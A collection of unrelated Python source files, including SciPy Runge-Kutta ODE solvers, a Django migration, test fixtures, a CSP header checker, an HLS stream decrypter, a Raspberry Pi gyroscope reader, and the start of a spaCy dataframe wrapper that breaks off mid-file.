guaranteed. If components of y have different scales, it might be
beneficial to set different `atol` values for different components by
passing array_like with shape (n,) for `atol`. Default values are
1e-3 for `rtol` and 1e-6 for `atol`.
vectorized : bool, optional
Whether `fun` is implemented in a vectorized fashion. Default is False.
Attributes
----------
n : int
Number of equations.
status : string
Current status of the solver: 'running', 'finished' or 'failed'.
t_bound : float
Boundary time.
direction : float
Integration direction: +1 or -1.
t : float
Current time.
y : ndarray
Current state.
t_old : float
Previous time. None if no steps were made yet.
step_size : float
Size of the last successful step. None if no steps were made yet.
nfev : int
        Number of evaluations of the system's right-hand side.
njev : int
Number of evaluations of the Jacobian. Is always 0 for this solver as it does not use the Jacobian.
nlu : int
Number of LU decompositions. Is always 0 for this solver.
References
----------
.. [1] P. Bogacki, L.F. Shampine, "A 3(2) Pair of Runge-Kutta Formulas",
Appl. Math. Lett. Vol. 2, No. 4. pp. 321-325, 1989.
"""
order = 3
error_estimator_order = 2
n_stages = 3
C = np.array([0, 1/2, 3/4])
A = np.array([
[0, 0, 0],
[1/2, 0, 0],
[0, 3/4, 0]
])
B = np.array([2/9, 1/3, 4/9])
E = np.array([5/72, -1/12, -1/9, 1/8])
P = np.array([[1, -4 / 3, 5 / 9],
[0, 1, -2/3],
[0, 4/3, -8/9],
[0, -1, 1]])
class RK45(RungeKutta):
"""Explicit Runge-Kutta method of order 5(4).
This uses the Dormand-Prince pair of formulas [1]_. The error is controlled
    assuming accuracy of the fourth-order method, but steps are taken
using the fifth-order accurate formula (local extrapolation is done).
A quartic interpolation polynomial is used for the dense output [2]_.
Can be applied in the complex domain.
Parameters
----------
fun : callable
Right-hand side of the system. The calling signature is ``fun(t, y)``.
Here ``t`` is a scalar, and there are two options for the ndarray ``y``:
It can either have shape (n,); then ``fun`` must return array_like with
shape (n,). Alternatively it can have shape (n, k); then ``fun``
must return an array_like with shape (n, k), i.e., each column
corresponds to a single column in ``y``. The choice between the two
options is determined by `vectorized` argument (see below).
t0 : float
Initial time.
y0 : array_like, shape (n,)
Initial state.
t_bound : float
Boundary time - the integration won't continue beyond it. It also
determines the direction of the integration.
first_step : float or None, optional
Initial step size. Default is ``None`` which means that the algorithm
should choose.
max_step : float, optional
Maximum allowed step size. Default is np.inf, i.e., the step size is not
bounded and determined solely by the solver.
rtol, atol : float and array_like, optional
Relative and absolute tolerances. The solver keeps the local error
estimates less than ``atol + rtol * abs(y)``. Here `rtol` controls a
relative accuracy (number of correct digits). But if a component of `y`
is approximately below `atol`, the error only needs to fall within
the same `atol` threshold, and the number of correct digits is not
guaranteed. If components of y have different scales, it might be
beneficial to set different `atol` values for different components by
passing array_like with shape (n,) for `atol`. Default values are
1e-3 for `rtol` and 1e-6 for `atol`.
vectorized : bool, optional
Whether `fun` is implemented in a vectorized fashion. Default is False.
Attributes
----------
n : int
Number of equations.
status : string
Current status of the solver: 'running', 'finished' or 'failed'.
t_bound : float
Boundary time.
direction : float
Integration direction: +1 or -1.
t : float
Current time.
y : ndarray
Current state.
t_old : float
Previous time. None if no steps were made yet.
step_size : float
Size of the last successful step. None if no steps were made yet.
nfev : int
        Number of evaluations of the system's right-hand side.
njev : int
Number of evaluations of the Jacobian. Is always 0 for this solver as it does not use the Jacobian.
nlu : int
Number of LU decompositions. Is always 0 for this solver.
References
----------
.. [1] J. R. Dormand, P. J. Prince, "A family of embedded Runge-Kutta
formulae", Journal of Computational and Applied Mathematics, Vol. 6,
No. 1, pp. 19-26, 1980.
.. [2] L. W. Shampine, "Some Practical Runge-Kutta Formulas", Mathematics
           of Computation, Vol. 46, No. 173, pp. 135-150, 1986.
"""
order = 5
error_estimator_order = 4
n_stages = 6
C = np.array([0, 1/5, 3/10, 4/5, 8/9, 1])
A = np.array([
[0, 0, 0, 0, 0],
[1/5, 0, 0, 0, 0],
[3/40, 9/40, 0, 0, 0],
[44/45, -56/15, 32/9, 0, 0],
[19372/6561, -25360/2187, 64448/6561, -212/729, 0],
[9017/3168, -355/33, 46732/5247, 49/176, -5103/18656]
])
B = np.array([35/384, 0, 500/1113, 125/192, -2187/6784, 11/84])
E = np.array([-71/57600, 0, 71/16695, -71/1920, 17253/339200, -22/525,
1/40])
# Corresponds to the optimum value of c_6 from [2]_.
P = np.array([
[1, -8048581381/2820520608, 8663915743/2820520608,
-12715105075/11282082432],
[0, 0, 0, 0],
[0, 131558114200/32700410799, -68118460800/10900136933,
87487479700/32700410799],
[0, -1754552775/470086768, 14199869525/1410260304,
-10690763975/1880347072],
[0, 127303824393/49829197408, -318862633887/49829197408,
701980252875 / 199316789632],
[0, -282668133/205662961, 2019193451/616988883, -1453857185/822651844],
[0, 40617522/29380423, -110615467/29380423, 69997945/29380423]])
class DOP853(RungeKutta):
"""Explicit Runge-Kutta method of order 8.
This is a Python implementation of "DOP853" algorithm originally written
    in Fortran [1]_, [2]_. Note that this is not a literal translation, but
the algorithmic core and coefficients are the same.
Can be applied in the complex domain.
Parameters
----------
fun : callable
Right-hand side of the system. The calling signature is ``fun(t, y)``.
Here, ``t`` is a scalar, and there are two options for the ndarray ``y``:
It can either have shape (n,); then ``fun`` must return array_like with
shape (n,). Alternatively it can have shape (n, k); then ``fun``
must return an array_like with shape (n, k), i.e. each column
corresponds to a single column in ``y``. The choice between the two
options is determined by `vectorized` argument (see below).
t0 : float
Initial time.
y0 : array_like, shape (n,)
Initial state.
t_bound : float
Boundary time - the integration won't continue beyond it. It also
determines the direction of the integration.
first_step : float or None, optional
Initial step size. Default is ``None`` which means that the algorithm
should choose.
max_step : float, optional
Maximum allowed step size. Default is np.inf, i.e. the step size is not
bounded and determined solely by the solver.
rtol, atol : float and array_like, optional
Relative and absolute tolerances. The solver keeps the local error
estimates less than ``atol + rtol * abs(y)``. Here `rtol` controls a
relative accuracy (number of correct digits). But if a component of `y`
is approximately below `atol`, the error only needs to fall within
the same `atol` threshold, and the number of correct digits is not
guaranteed. If components of y have different scales, it might be
beneficial to set different `atol` values for different components by
passing array_like with shape (n,) for `atol`. Default values are
1e-3 for `rtol` and 1e-6 for `atol`.
vectorized : bool, optional
Whether `fun` is implemented in a vectorized fashion. Default is False.
Attributes
----------
n : int
Number of equations.
status : string
Current status of the solver: 'running', 'finished' or 'failed'.
t_bound : float
Boundary time.
direction : float
Integration direction: +1 or -1.
t : float
Current time.
y : ndarray
Current state.
t_old : float
Previous time. None if no steps were made yet.
step_size : float
Size of the last successful step. None if no steps were made yet.
nfev : int
        Number of evaluations of the system's right-hand side.
njev : int
Number of evaluations of the Jacobian. Is always 0 for this solver
as it does not use the Jacobian.
nlu : int
Number of LU decompositions. Is always 0 for this solver.
References
----------
    .. [1] E. Hairer, S. P. Norsett, G. Wanner, "Solving Ordinary Differential
Equations I: Nonstiff Problems", Sec. II.
.. [2] `Page with original Fortran code of DOP853
<http://www.unige.ch/~hairer/software.html>`_.
"""
n_stages = dop853_coefficients.N_STAGES
order = 8
error_estimator_order = 7
A = dop853_coefficients.A[:n_stages, :n_stages]
B = dop853_coefficients.B
C = dop853_coefficients.C[:n_stages]
E3 = dop853_coefficients.E3
E5 = dop853_coefficients.E5
D = dop853_coefficients.D
A_EXTRA = dop853_coefficients.A[n_stages + 1:]
C_EXTRA = dop853_coefficients.C[n_stages + 1:]
def __init__(self, fun, t0, y0, t_bound, max_step=np.inf,
rtol=1e-3, atol=1e-6, vectorized=False,
first_step=None, **extraneous):
super(DOP853, self).__init__(fun, t0, y0, t_bound, max_step,
rtol, atol, vectorized, first_step,
**extraneous)
self.K_extended = np.empty((dop853_coefficients.N_STAGES_EXTENDED,
self.n), dtype=self.y.dtype)
self.K = self.K_extended[:self.n_stages + 1]
def _estimate_error(self, K, h): # Left for testing purposes.
err5 = np.dot(K.T, self.E5)
err3 = np.dot(K.T, self.E3)
denom = np.hypot(np.abs(err5), 0.1 * np.abs(err3))
correction_factor = np.ones_like(err5)
mask = denom > 0
correction_factor[mask] = np.abs(err5[mask]) / denom[mask]
return h * err5 * correction_factor
def _estimate_error_norm(self, K, h, scale):
err5 = np.dot(K.T, self.E5) / scale
err3 = np.dot(K.T, self.E3) / scale
err5_norm_2 = np.sum(err5**2)
err3_norm_2 = np.sum(err3**2)
if err5_norm_2 == 0 and err3_norm_2 == 0:
return 0
denom = err5_norm_2 + 0.01 * err3_norm_2
return np.abs(h) * err5_norm_2 / np.sqrt(denom * len(scale))
def _dense_output_impl(self):
K = self.K_extended
h = self.h_previous
for s, (a, c) in enumerate(zip(self.A_EXTRA, self.C_EXTRA),
start=self.n_stages + 1):
dy = np.dot(K[:s].T, a[:s]) * h
K[s] = self.fun(self.t_old + c * h, self.y_old + dy)
F = np.empty((dop853_coefficients.INTERPOLATOR_POWER, self.n),
dtype=self.y_old.dtype)
f_old = K[0]
delta_y = self.y - self.y_old
F[0] = delta_y
F[1] = h * f_old - delta_y
F[2] = 2 * delta_y - h * (self.f + f_old)
F[3:] = h * np.dot(self.D, K)
return Dop853DenseOutput(self.t_old, self.t, self.y_old, F)
class RkDenseOutput(DenseOutput):
def __init__(self, t_old, t, y_old, Q):
super(RkDenseOutput, self).__init__(t_old, t)
self.h = t - t_old
self.Q = Q
self.order = Q.shape[1] - 1
self.y_old = y_old
def _call_impl(self, t):
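        # Evaluate the interpolating polynomial
        # y(t) = y_old + h * Q @ [x, x**2, ..., x**(order + 1)]
        # with x = (t - t_old) / h, for scalar or 1-D array `t`.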
x = (t - self.t_old) / self.h
if t.ndim == 0:
p = np.tile(x, self.order + 1)
p = np.cumprod(p)
else:
p = np.tile(x, (self.order + 1, 1))
p = np.cumprod(p, axis=0)
y = self.h * np.dot(self.Q, p)
if y.ndim == 2:
y += self.y_old[:, None]
else:
y += self.y_old
return y
class Dop853DenseOutput(DenseOutput):
def __init__(self, t_old, t, y_old, F):
super(Dop853DenseOutput, self).__init__(t_old, t)
self.h = t - t_old
self.F = F
self.y_old = y_old
def _call_impl(self, t):
x = (t - self.t_old) / self.h
if t.ndim == 0:
y = np.zeros_like(self.y_old)
else:
x = x[:, None]
y = np.zeros((len(x), len(self.y_old)), dtype=self.y_old.dtype)
for i, f in enumerate(reversed(self.F)):
y += f
if i % 2 == 0:
y *= x
else:
y *= 1 - x
y += self.y_old
return y.T
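if __name__ == "__main__":  # pragma: no cover
    # Minimal smoke test, not part of the original module: exercise the
    # solvers above through SciPy's public entry point (this assumes the file
    # lives inside scipy.integrate). The decay ODE y' = -0.5 * y has the
    # analytic solution y(t) = y0 * exp(-0.5 * t).
    from scipy.integrate import solve_ivp
    for method in ("RK23", "RK45", "DOP853"):
        sol = solve_ivp(lambda t, y: -0.5 * y, (0.0, 10.0), [2.0],
                        method=method, rtol=1e-6, atol=1e-9, dense_output=True)
        ts = np.linspace(0.0, 10.0, 50)
        err = np.max(np.abs(sol.sol(ts)[0] - 2.0 * np.exp(-0.5 * ts)))
        print(method, sol.success, err)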
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('extranet', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='issue',
name='estimated_on',
),
migrations.AddField(
model_name='issue',
name='estimated_at',
field=models.DateTimeField(null=True, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='need',
name='description',
field=models.TextField(default=b''),
preserve_default=True,
),
]
|
# -*- coding: utf-8 -*-
#
# dbscan_cluster.py
#
# Copyright 2017 Sebastian Spreizer
# The MIT License
import numpy as np
from sklearn.cluster import DBSCAN
__all__ = [
'detect',
]
def detect(data, eps=1, min_samples=10, core_samples_mask=False):
X = np.vstack(data).T
db = DBSCAN(eps=eps, min_samples=min_samples).fit(X)
labels = db.labels_
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
if core_samples_mask:
core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
core_samples_mask[db.core_sample_indices_] = True
return n_clusters_, labels, core_samples_mask
else:
return n_clusters_, labels
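if __name__ == '__main__':
    # Minimal usage sketch, not part of the original module: two
    # well-separated 2-D blobs should come back as two clusters.
    rng = np.random.RandomState(0)
    xs = np.concatenate([rng.normal(0, 0.1, 100), rng.normal(5, 0.1, 100)])
    ys = np.concatenate([rng.normal(0, 0.1, 100), rng.normal(5, 0.1, 100)])
    n_clusters, labels = detect([xs, ys], eps=0.5, min_samples=5)
    print(n_clusters)  # expected: 2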
|
# Copyright (c) Lawrence Livermore National Security, LLC and other VisIt
# Project developers. See the top-level LICENSE file for dates and other
# details. No copyright assignment is required to contribute to VisIt.
"""
file: test_common.py
author: Cyrus Harrison (cyrush@llnl.gov)
created: 4/9/2010
description:
Unit tests for common helpers.
"""
import unittest
import os
import sys
from os.path import join as pjoin
from visit_utils import common
output_dir = pjoin(os.path.split(__file__)[0],"_output")
data_dir = pjoin(os.path.split(__file__)[0],"_data")
class TestCommon(unittest.TestCase):
def setUp(self):
if not os.path.exists(output_dir):
os.mkdir(output_dir)
def test_sexe(self):
ofile = pjoin(output_dir,"_sexe_test")
if os.path.exists(ofile):
os.remove(ofile)
common.sexe("touch %s" % ofile)
self.assertTrue(os.path.isfile(ofile))
def test_hostname(self):
res = common.hostname()
self.assertTrue(len(res) > 0)
def test_lsearch(self):
res = common.lsearch(dir(),"self")
self.assertTrue(len(res) > 0)
def test_define_module(self):
mymodule = common.define_module("mymodule","x=10.0")
self.assertEqual(mymodule.x,10.0)
def test_define_global_module(self):
common.define_module("mymodule","x=10.0",globals())
self.assertEqual(mymodule.x,10.0)
def test_load_params(self):
pfile = pjoin(data_dir,"params.test.in")
p = common.load_params(pfile)
self.assertEqual(p.tree.x,10.0)
def test_load_params_root(self):
pfile = pjoin(data_dir,"params.test.in")
p = common.load_params(pfile)
root = p.root
self.assertTrue(root.has_property("tree"))
self.assertEqual(root.tree.x,10.0)
if __name__ == '__main__':
unittest.main()
|
from Crypto.Cipher import AES
class DecrypterProvider(object):
def __init__(self, network, m3u8, get_by_comparison = False):
self.__network = network
self.m3u8 = m3u8
self.key = None
self.uri = self.m3u8.data["keys"][1]["uri"]
if get_by_comparison:
self.get_key_by_comparison()
else:
self.get_key()
def get_key_by_comparison(self) -> bytearray:
        if self.key is None:
key1 = bytearray(self.__network.get(self.uri).content)
key2 = key1
tries = 1
            while key1 == key2 and tries <= 25:
key2 = bytearray(self.__network.get(self.uri).content)
tries += 1
final_key = []
for index in range(len(key1)):
smaller = min(key1[index], key2[index])
final_key.append(smaller)
self.key = bytearray(final_key)
return self.key
def get_key(self) -> bytearray:
        if self.key is None:
self.key = bytearray(self.__network.get(self.uri).content)
return self.key
@staticmethod
def create_initialization_vector(chunk_number) -> bytearray:
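        # Assumption based on the HLS spec (RFC 8216, section 5.2): when no
        # explicit IV is given, the AES-128-CBC IV is the chunk's media
        # sequence number as a 16-byte big-endian integer, i.e. bytes 0-11
        # stay zero and the number is packed into bytes 12-15 below.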
iv = [0 for _ in range(0, 16)]
for i in range(12, 16):
iv[i] = chunk_number[0] >> 8 * (15 - i) & 255
return bytearray(iv)
def get_decrypter(self, chunk_number) -> AES:
iv = self.create_initialization_vector(chunk_number)
        return AES.new(self.get_key(), AES.MODE_CBC, iv=iv)
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function
from libtbx.program_template import ProgramTemplate
from mmtbx.secondary_structure import ss_validation
# =============================================================================
class Program(ProgramTemplate):
description = '''
phenix.secondary_structure_validation: tool for validation of secondary
structure annotations.
Usage examples:
phenix.secondary_structure_validation model.pdb
phenix.secondary_structure_validation model.cif
phenix.secondary_structure_validation model.pdb nproc=7
'''
datatypes = ['model', 'phil']
master_phil_str = ss_validation.master_phil_str
# ---------------------------------------------------------------------------
def validate(self):
print('Validating inputs', file=self.logger)
self.data_manager.has_models(raise_sorry=True)
# ---------------------------------------------------------------------------
def run(self):
# I'm guessing self.data_manager, self.params and self.logger
# are already defined here...
print('Using model: %s' % self.data_manager.get_default_model_name(), file=self.logger)
# this must be mmtbx.model.manager?
model = self.data_manager.get_model()
self.val_obj = ss_validation.validate(
model=model,
params = self.params.ss_validation,
log = self.logger)
# ---------------------------------------------------------------------------
def get_results(self):
return self.val_obj.get_results()
# =============================================================================
# end
|
import requests
import os
import glob
from datetime import datetime, timedelta
def get_config(config_path):
"""
    Function to get the configuration file from a local path or online repository
"""
# Try to get config file or raise exception
try:
if config_path.startswith('http'):
r = requests.get(config_path)
config_var = r.text.split("\n")[:-1]
else:
with open(config_path) as f:
r = f.readlines()
config_var = [x.replace("\n", "") for x in r]
except requests.exceptions.RequestException as e:
raise SystemExit(e)
# Extract config variables to dictionary or raise Exception
try:
config = dict(x.split("=") for x in config_var)
except Exception:
raise Exception("Malformed .config file.")
# Return config variables as a dictionary
    return config
def get_download_variables(dataset: str, country: str, end_date: str, config_path: str):
"""
    Function to get download variables for a particular dataset from the config file
This could be simplified
"""
# Get config variables from repository
config = get_config(config_path)
# Extract dataset id or raise missing dataset error
try:
dataset_id = config["_".join([country, dataset, "ID"])]
except Exception:
raise KeyError(
"No config value for {}. To add a new dataset, see the Readme.".format(
"_".join([country, dataset, "ID"])
)
)
# Extract dataset origin or raise missing dataset error
try:
dataset_origin = config["_".join([country, dataset, "Origin"])]
except Exception:
raise KeyError(
"No config value for {}. To add a new dataset, see the Readme.".format(
"_".join([country, dataset, "Origin"])
)
)
    # Convert dataset origin string to datetime object
dataset_origin = date_str_to_datetime(dataset_origin)
# Return config variables as dict
return {
"dataset_id": dataset_id,
"start_date": dataset_origin,
"end_date": end_date,
}
def date_str_to_datetime(date: str):
"""
    Function to parse an origin date in the format '%Y_%m_%d_%H%M', '%Y_%m_%d_%H' or '%Y_%m_%d'
"""
# List of recognized date formats
formats = ["%Y_%m_%d_%H%M", "%Y_%m_%d_%H", "%Y_%m_%d"]
# Try to match formats until one succeeds
for format in formats:
try:
# Return datetime object
return datetime.strptime(date, format)
except ValueError:
pass
# Raise ValueError for unknown date format
raise ValueError("Unknown date format.")
def get_file_dates(start_date, end_date, frequency):
"""
Function to get date sequence between start_date and end_date with a
given frequency
This could be replaced by a datetime function
"""
# List to store dataset dates
data_dates = []
# Define start of date list
date = start_date
# Loop through date range, incrementing by `frequency` hours
while date < end_date:
data_dates.append(date)
date = date + timedelta(hours=frequency)
# Return list of dataset dates
return data_dates
def get_existing_dates(outdir: str, area: str):
"""
Function to get dates from files in the outdir
"""
# Extract file names from csv files in outdir (only for current area)
date_str = [os.path.basename(x) for x in glob.glob(outdir + "/" + area + "_" + "*.csv")]
# Remove area from file name
date_str = [x.replace(area + "_", "") for x in date_str]
# Remove extension from file name
date_str = [x.replace(".csv", "") for x in date_str]
# Convert date string to datetime object
date_str = [date_str_to_datetime(x) for x in date_str]
# If any existing files are found, notify user
if len(date_str) > 0:
message = "Found existing collection in output directory ({} files).\nOnly new files will be downloaded."
print(message.format(str(len(date_str))))
# Return a list of the dates of datasets that have already been downloaded
return date_str
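if __name__ == "__main__":
    # Minimal sketch of the date helpers (illustrative; the config helpers
    # need a real config file or URL, so they are not exercised here).
    origin = date_str_to_datetime("2020_01_01_00")
    dates = get_file_dates(origin, origin + timedelta(hours=6), 3)
    print(dates)  # [datetime(2020, 1, 1, 0, 0), datetime(2020, 1, 1, 3, 0)]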
|
from securityheaders.checkers import Finding, FindingType, FindingSeverity
from .cspcheck import CSPCheck
class CSPCheckDeprecated(CSPCheck):
def __init__(self, csp):
self.csp = csp
def check(self):
csp = self.csp
if not csp or not csp.parsedstring:
return []
        findings = []
        if csp.directive.REPORT_URI in csp.parsedstring:
            findings.append(Finding(csp.headerkey, FindingType.DEPRECATED_DIRECTIVE, 'report-uri is deprecated in CSP3. Please use the report-to directive instead.', FindingSeverity.INFO, csp.directive.REPORT_URI))
        return findings
|
from typing import Dict
import pytest
from django.apps import apps
from django.core import management
from django.test import RequestFactory
from radical_translations.agents.models import Organisation, Person
from radical_translations.agents.tests.factories import (
OrganisationFactory,
PersonFactory,
)
from radical_translations.cms.models import BiographyPage, BlogIndexPage, BlogPost
from radical_translations.cms.tests.factories import (
BiographyPageFactory,
BlogIndexPageFactory,
BlogPostFactory,
)
from radical_translations.core.models import Resource, Title
from radical_translations.core.tests.factories import ResourceFactory, TitleFactory
from radical_translations.users.models import User
from radical_translations.users.tests.factories import UserFactory
pytestmark = pytest.mark.django_db
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> User:
return UserFactory()
@pytest.fixture
def request_factory() -> RequestFactory:
return RequestFactory()
@pytest.fixture
def vocabulary():
management.call_command("vocab", "init")
app = apps.get_app_config("controlled_vocabulary")
app._load_vocabulary_managers() # type: ignore
@pytest.fixture
def organisation() -> Organisation:
return OrganisationFactory()
@pytest.fixture
def person() -> Person:
return PersonFactory()
@pytest.fixture
def resource() -> Resource:
return ResourceFactory()
@pytest.fixture
def title() -> Title:
return TitleFactory()
@pytest.fixture
def entry_original() -> Dict[str, Dict[str, str]]:
return {
"gsx$title": {"$t": "Les ruines ou Méditation sur les révolutions des Empires"},
"gsx$authors": {"$t": "Constantin-François Volney"},
"gsx$status": {"$t": "Source-text"},
"gsx$statussource": {"$t": ""},
"gsx$translationof": {"$t": ""},
"gsx$editionof": {"$t": ""},
"gsx$partof": {"$t": ""},
"gsx$journaltitle": {"$t": ""},
"gsx$editionnumber": {"$t": ""},
"gsx$year": {"$t": "1791"},
"gsx$location": {"$t": "0001: Paris [FR]"},
"gsx$organisation": {"$t": "Desenne"},
"gsx$language": {"$t": "French [fr]"},
"gsx$genre": {"$t": "essays"},
"gsx$url": {"$t": ""},
"gsx$libraries": {"$t": ""},
"gsx$notes": {"$t": ""},
"gsx$citation": {"$t": "some citation"},
"gsx$paratextnotes": {"$t": "note this"},
"gsx$paratextprefaceby": {"$t": ""},
}
@pytest.fixture
def entry_translation() -> Dict[str, Dict[str, str]]:
return {
"gsx$title": {"$t": "The Ruins: or a Survey of the Revolutions of Empires"},
"gsx$authors": {"$t": "James Marshall"},
"gsx$status": {"$t": "Translation: integral"},
"gsx$statussource": {"$t": ""},
"gsx$translationof": {
"$t": "Les ruines ou Méditation sur les révolutions des Empires"
},
"gsx$editionof": {"$t": ""},
"gsx$partof": {"$t": ""},
"gsx$journaltitle": {"$t": ""},
"gsx$editionnumber": {"$t": ""},
"gsx$year": {"$t": "1792"},
"gsx$isyearfictional": {"$t": "FALSE"},
"gsx$location": {"$t": "0002: London [UK]"},
"gsx$islocationfictional": {"$t": "FALSE"},
"gsx$organisation": {"$t": "J. Johnson"},
"gsx$language": {"$t": "English [en]"},
"gsx$genre": {"$t": "essay"},
"gsx$url": {"$t": ""},
"gsx$libraries": {"$t": ""},
"gsx$notes": {"$t": ""},
"gsx$citation": {"$t": "another citation"},
"gsx$paratextnotes": {"$t": "some more notes"},
"gsx$paratextprefaceby": {"$t": "author"},
}
@pytest.fixture
def entry_edition() -> Dict[str, Dict[str, str]]:
return {
"gsx$title": {"$t": "Discours sur le gouvernement"},
"gsx$authors": {"$t": "P.A. Samson; P.A. Dalila"},
"gsx$status": {"$t": "Translation: integral"},
"gsx$statussource": {"$t": ""},
"gsx$translationof": {"$t": "Discourses concerning government"},
"gsx$editionof": {"$t": "Discours sur le gouvernement"},
"gsx$partof": {"$t": ""},
"gsx$journaltitle": {"$t": ""},
"gsx$editionnumber": {"$t": ""},
"gsx$year": {"$t": "1794"},
"gsx$isyearfictional": {"$t": "FALSE"},
"gsx$location": {"$t": "0001: Paris [FR]"},
"gsx$islocationfictional": {"$t": "FALSE"},
"gsx$organisation": {"$t": "Josse"},
"gsx$language": {"$t": "French [fr]"},
"gsx$genre": {"$t": "essay"},
"gsx$theme": {"$t": ""},
"gsx$subject": {"$t": ""},
"gsx$url": {
"$t": "https://gallica.bnf.fr/ark:/12148/bpt6k2054034/f7.image.texteImage"
},
"gsx$libraries": {"$t": "BNF"},
"gsx$notes": {
"$t": (
"Extracts in La Décade philosophique vol 3, year III/1, no. 24, p. "
"537-544; vol 4, ear III/2, n. 26, p. 84-95."
)
},
"gsx$citation": {"$t": ""},
"gsx$paratextnotes": {"$t": ""},
"gsx$paratextprefaceby": {"$t": ""},
}
@pytest.fixture
def entry_search() -> Dict[str, Dict[str, str]]:
return {
"gsx$title": {"$t": "Les ruines de la search :)"},
"gsx$authors": {"$t": "search test"},
"gsx$status": {"$t": "Source-text"},
"gsx$statussource": {"$t": ""},
"gsx$translationof": {"$t": ""},
"gsx$editionof": {"$t": ""},
"gsx$partof": {"$t": ""},
"gsx$journaltitle": {"$t": ""},
"gsx$editionnumber": {"$t": ""},
"gsx$year": {"$t": "1791"},
"gsx$location": {"$t": "0001: Paris [FR]"},
"gsx$organisation": {"$t": "publisher name"},
"gsx$language": {"$t": "French [fr]"},
"gsx$genre": {"$t": "essay"},
"gsx$url": {"$t": ""},
"gsx$libraries": {"$t": ""},
"gsx$notes": {"$t": ""},
"gsx$citation": {"$t": ""},
"gsx$paratextnotes": {"$t": ""},
"gsx$paratextprefaceby": {"$t": ""},
}
@pytest.fixture
def blog_index_page() -> BlogIndexPage:
return BlogIndexPageFactory()
@pytest.fixture
def blog_post_1() -> BlogPost:
return BlogPostFactory()
@pytest.fixture
def blog_post_2() -> BlogPost:
return BlogPostFactory()
@pytest.fixture
def biography_page() -> BiographyPage:
return BiographyPageFactory()
|
#!/usr/bin/python
# http://github.com/timestocome
# source code from
# https://github.com/bashardawood/L3G4200D-Python/blob/master/gyro.py
# data sheet
# https://www.parallax.com/sites/default/files/downloads/27911-Gyroscope-3-Axis-L3G4200D-Guide-v1.1.pdf
# i2c must be set up on Raspberry Pi first
# https://learn.adafruit.com/adafruits-raspberry-pi-lesson-4-gpio-setup/configuring-i2c
# wiring
# ground to ground (pin 6)
# vcc to 5V (pin 4)
# SDA to SDA (pin 3)
# SCL to SCL (pin 5)
from time import sleep
import smbus
#converts 16 bit two's complement reading to signed int
def getSignedNumber(number):
if number & (1 << 15):
return number | ~65535
else:
return number & 65535
#open /dev/i2c-1
i2c_bus = smbus.SMBus(1)
#i2c slave address of the L3G4200D
# type sudo i2cdetect -y 1 to see which memory location has signal
i2c_address = 0x69
#initialise the L3G4200D
#normal mode and all axes on to control reg1 (without this write the chip
#stays powered down and every axis reads zero)
i2c_bus.write_byte_data(i2c_address,0x20,0x0F)
#full 2000dps to control reg4
hz = 2000
i2c_bus.write_byte_data(i2c_address,0x23,0x20)
# give the chip time to wake up
sleep(0.5)
px = py = pz = 0
#read data, combine and display
while True:
# read low and high bytes for x
i2c_bus.write_byte(i2c_address,0x28)
X_L = i2c_bus.read_byte(i2c_address)
i2c_bus.write_byte(i2c_address,0x29)
X_H = i2c_bus.read_byte(i2c_address)
    # combine high and low bytes ( shift H 8 bits and or with L )
X = X_H << 8 | X_L
# y
i2c_bus.write_byte(i2c_address,0x2A)
Y_L = i2c_bus.read_byte(i2c_address)
i2c_bus.write_byte(i2c_address,0x2B)
Y_H = i2c_bus.read_byte(i2c_address)
Y = Y_H << 8 | Y_L
# z
i2c_bus.write_byte(i2c_address,0x2C)
Z_L = i2c_bus.read_byte(i2c_address)
i2c_bus.write_byte(i2c_address,0x2D)
Z_H = i2c_bus.read_byte(i2c_address)
Z = Z_H << 8 | Z_L
X = getSignedNumber(X)
Y = getSignedNumber(Y)
Z = getSignedNumber(Z)
# http://forum.arduino.cc/index.php?topic=183417.0
# 0.00875 degrees-per-second-per-LSB is 114.285714285714 LSB's-per-degree-per-second. :(
# To get DPS from the raw number you subtract the Zero Rate Offset
# (the value you get when not rotating),
# multiply the answer by 8.75 to get milli-DPS
# and divide by 1000 to get DPS (or multiply by 8750
# to get micro-DPS and divide by 1,000,000 to get DPS).
    print('x %.1f y %.1f z %.1f raw' % (X, Y, Z))
# see documentation and sample code
# https://www.parallax.com/product/27911
dx = (px - X) / 114
dy = (py - Y) / 114
dz = (pz - Z) / 114
print(dx, dy, dz)
px = X
py = Y
pz = Z
sleep(1.0)
|
# coding: utf-8
from __future__ import unicode_literals
import pandas as pd
from dframcy import utils
class DframCy(object):
"""
Dataframe integration with spaCy's linguistic annotations.
"""
def __init__(self, nlp_pipeline):
"""
:param nlp_pipeline: nlp pipeline to be used (i.e. language model).
"""
self._nlp = nlp_pipeline
@property
def nlp(self):
"""
        To get the wrapped nlp pipeline (call it on text to get a Doc)
        :return: spaCy Language object
"""
return self._nlp
@staticmethod
def get_token_attribute_value(token, attribute_name, _type):
"""
To get value of specific attribute of spacy's Token class
        :param token: token object of class Token
        :param attribute_name: name of the attribute whose value is required
        :param _type: type of class attribute (property, attribute)
        :return: attribute value
"""
if _type == "attribute" or _type == "int_format_attribute":
value = getattr(token, attribute_name)
if attribute_name in ["head", "left_edge", "right_edge"]:
return value.text
else:
return value
elif _type == "property":
value = getattr(token, attribute_name)
if attribute_name in ["n_lefts", "n_rights", "has_vector", "is_sent_start"]:
return value
else:
return ", ".join([v.text for v in value])
elif _type == "additional_attribute":
if attribute_name == "id":
return getattr(token, "i")
elif attribute_name == "start":
return getattr(token, "idx")
elif attribute_name == "end":
return getattr(token, "idx") + len(token)
elif _type == "custom_attributes":
return getattr(getattr(token, "_"), attribute_name)
def get_token_attribute_dict(self, doc, consistent_columns):
"""
        To get an attribute dictionary for the sequence of Token objects in a Doc
:param doc: Doc object
:param consistent_columns: name attributes required with its type
:return: python dictionary containing attributes names as keys
and list of all token values as value.
"""
token_attribute_dictionary = {}
for token in doc:
for column_name in consistent_columns:
if column_name[0] in token_attribute_dictionary:
token_attribute_dictionary[column_name[0]].append(
self.get_token_attribute_value(
token, column_name[0], column_name[1]
)
)
else:
token_attribute_dictionary[column_name[0]] = []
token_attribute_dictionary[column_name[0]].append(
self.get_token_attribute_value(
token, column_name[0], column_name[1]
)
)
return token_attribute_dictionary
@staticmethod
